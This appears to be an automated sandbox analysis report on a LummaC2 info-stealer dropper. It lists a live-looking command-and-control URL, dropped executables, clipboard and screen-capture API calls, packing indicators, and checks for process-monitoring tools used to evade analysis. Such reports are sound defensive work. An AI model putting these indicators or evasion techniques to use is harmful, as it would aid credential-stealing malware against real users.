Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:40:53 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, 00000003.00000003.2380109507.0000000001056000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380215026.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380041481.000000000104C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381386136.0000000000789000.00000004.00000001.01000000.00000008.sdmp, Set-up.exe, 00000003.00000002.2382170403.000000000105A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000003.00000003.2380109507.0000000001056000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380215026.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380041481.000000000104C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2382170403.000000000105A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1
Source: Set-up.exe, 00000003.00000003.2380109507.0000000001056000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380215026.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2380041481.000000000104C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2382170403.000000000105A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963
Source: Set-up.exe, 00000003.00000002.2382470307.0000000003F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000003.00000002.2381386136.0000000000789000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_006E1B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_006E1B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_006E1B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_006E1B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_006E1D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_006E1D10

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.8wiUGtm9UM.exe.530000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: 8wiUGtm9UM.exe	Static PE information: section name:
Source: 8wiUGtm9UM.exe	Static PE information: section name: .idata
Source: 8wiUGtm9UM.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E5135	2_2_006E5135
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B8720	2_2_006B8720
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CD840	2_2_006CD840
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C9820	2_2_006C9820
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E483C	2_2_006E483C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C683F	2_2_006C683F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CA800	2_2_006CA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EA800	2_2_006EA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EB813	2_2_006EB813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D30E0	2_2_006D30E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D70F9	2_2_006D70F9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E80C5	2_2_006E80C5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D20C0	2_2_006D20C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EA0D0	2_2_006EA0D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E68A0	2_2_006E68A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C8095	2_2_006C8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DC894	2_2_006DC894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B3960	2_2_006B3960
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006BC97C	2_2_006BC97C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B5970	2_2_006B5970
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006BB14F	2_2_006BB14F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006ED140	2_2_006ED140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DC9E9	2_2_006DC9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EE1F0	2_2_006EE1F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DC9DA	2_2_006DC9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B61D0	2_2_006B61D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D59B0	2_2_006D59B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DC984	2_2_006DC984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D7A40	2_2_006D7A40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006ED240	2_2_006ED240
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C4A50	2_2_006C4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B8A20	2_2_006B8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CE230	2_2_006CE230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D6230	2_2_006D6230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C720B	2_2_006C720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CC205	2_2_006CC205
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CAAE0	2_2_006CAAE0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006BF2A0	2_2_006BF2A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DC289	2_2_006DC289
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C1A94	2_2_006C1A94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B9290	2_2_006B9290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C7B75	2_2_006C7B75
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006BD35C	2_2_006BD35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006BAB20	2_2_006BAB20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006ED320	2_2_006ED320
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B4310	2_2_006B4310
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E1B10	2_2_006E1B10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E6BF0	2_2_006E6BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DA3B0	2_2_006DA3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006ED3B0	2_2_006ED3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EDBB0	2_2_006EDBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D3C60	2_2_006D3C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006BE465	2_2_006BE465
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B7440	2_2_006B7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D8C46	2_2_006D8C46
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B4C50	2_2_006B4C50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CDC50	2_2_006CDC50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006ED450	2_2_006ED450
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C64E0	2_2_006C64E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E74F0	2_2_006E74F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CD560	2_2_006CD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EE540	2_2_006EE540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D1550	2_2_006D1550
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D1D10	2_2_006D1D10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EA510	2_2_006EA510
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D7D94	2_2_006D7D94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B6660	2_2_006B6660
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C5640	2_2_006C5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D5640	2_2_006D5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B5E30	2_2_006B5E30
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C9605	2_2_006C9605
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D66C0	2_2_006D66C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DFEC0	2_2_006DFEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D26D3	2_2_006D26D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E7EA0	2_2_006E7EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EDEB0	2_2_006EDEB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006C0F71	2_2_006C0F71
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DBF45	2_2_006DBF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B2F40	2_2_006B2F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CF700	2_2_006CF700
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006B9710	2_2_006B9710
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006D3FF1	2_2_006D3FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E5FF0	2_2_006E5FF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006CDFC0	2_2_006CDFC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006DDFC3	2_2_006DDFC3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006E7790	2_2_006E7790

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 006C4A40 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 006B7FF0 appears 45 times

Source: 8wiUGtm9UM.exe, 00000000.00000002.2178478857.00000000053A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs 8wiUGtm9UM.exe
Source: 8wiUGtm9UM.exe, 00000000.00000002.2175779027.0000000000C06000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs 8wiUGtm9UM.exe
Source: 8wiUGtm9UM.exe	Binary or memory string: OriginalFilenameladddad.exe4 vs 8wiUGtm9UM.exe

Source: 8wiUGtm9UM.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.8wiUGtm9UM.exe.530000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: 8wiUGtm9UM.exe

Static PE information: Section: lfpzggwa ZLIB complexity 0.99458838866596

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/3@8/2

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 2_2_006DD110 CoCreateInstance,

2_2_006DD110

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8wiUGtm9UM.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 8wiUGtm9UM.exe	Virustotal: Detection: 33%
Source: 8wiUGtm9UM.exe	ReversingLabs: Detection: 55%

Source: 8wiUGtm9UM.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8wiUGtm9UM.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: Set-up.exe	String found in binary or memory: /8A8JnRf/kKj/hXvgD/AKEbwf8A+Ezov/yFR/xPR/1a3/zdv/xRD/ill/1fX/zmP/5Qj+J+iv7YP+Fe+AP+hG8H/wDhM6L/APIVH/CvfAH/AEI3g/8A8JnRf/kKj/iej/q1v/m7f/iiaf8AFLX/AKvp/wCcy/8AyhH8S9Ff20f8K98Af9CN4P8A/CZ0X/5Co/4V74A/6Ebwf/4TOi//ACFR/wAT0f8AVrf/ADdv/wAUQ/4pa/8AV9P/ADmX/wCUI/iXo

Source: unknown	Process created: C:\Users\user\Desktop\8wiUGtm9UM.exe "C:\Users\user\Desktop\8wiUGtm9UM.exe"
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 8wiUGtm9UM.exe

Static file information: File size 6156288 > 1048576

Source: 8wiUGtm9UM.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x43d600
Source: 8wiUGtm9UM.exe	Static PE information: Raw size of lfpzggwa is bigger than: 0x100000 < 0x19cc00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe

Unpacked PE file: 0.2.8wiUGtm9UM.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfpzggwa:EW;ncmmphhn:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: LummaC2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4fec3
Source: 8wiUGtm9UM.exe	Static PE information: real checksum: 0x5e8060 should be: 0x5e4524

Source: 8wiUGtm9UM.exe	Static PE information: section name:
Source: 8wiUGtm9UM.exe	Static PE information: section name: .idata
Source: 8wiUGtm9UM.exe	Static PE information: section name:
Source: 8wiUGtm9UM.exe	Static PE information: section name: lfpzggwa
Source: 8wiUGtm9UM.exe	Static PE information: section name: ncmmphhn
Source: 8wiUGtm9UM.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006ED0F0 push eax; mov dword ptr [esp], 03020130h		2_2_006ED0F1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 2_2_006EA480 push eax; mov dword ptr [esp], C9D6D7D4h		2_2_006EA48E

Source: 8wiUGtm9UM.exe

Static PE information: section name: lfpzggwa entropy: 7.953387010367614

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
